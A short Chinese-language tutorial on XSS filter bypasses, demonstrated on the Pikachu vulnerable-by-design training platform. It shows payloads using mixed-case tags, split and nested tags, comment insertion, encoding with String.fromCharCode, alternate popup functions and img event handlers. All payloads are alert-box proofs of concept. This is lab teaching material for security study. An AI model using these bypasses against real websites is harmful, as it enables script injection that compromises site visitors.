在这先说一下xss绕过的两种方式,之后在pikachu平台上进行操作
Xss绕过-过滤-转换
前端绕过,我们直接可以抓包重放,或者修改html前端代码
大小写,示例:<sCriPt>ALerT(222)</ScrIpt>
拼凑,示例:<scr<script>ipt>alert(222)</scri</script>pt>
使用注释进行干扰:<scri<!—test-->pt>alert(222)</sc<!—test-->ript>
Xss绕过-过滤-编码
后台过滤了特殊字符,比如<script>标签,但该标签可以被各种编码,后台不一定会过滤当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行
编码也不能乱用,编码要在输出点被正常识别和翻译
回到pikachu平台,打开xss过滤板块
XSS-过滤
输入 <script>alert(11)</script>
并没有弹框
我们查看网页源码
可以看到把我们写的那句话都不显示,说明过滤了小写字母,我们可以看一下源码
接下来我们采用大小写混合 输入<sCRipt>alert(222)</ScriPt>
成功弹框
弹窗函数:alert prompt confirm eval(String.fromCharCode())
<script>alert (1)</script>
<script>prompt (1)</script>
<script> confirm (1)</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
xss输出位置与触发方式
脚本直接触发 <script>alert (1)</script>
借助标签事件属性触发 <img src="#" onclick="alert(1)">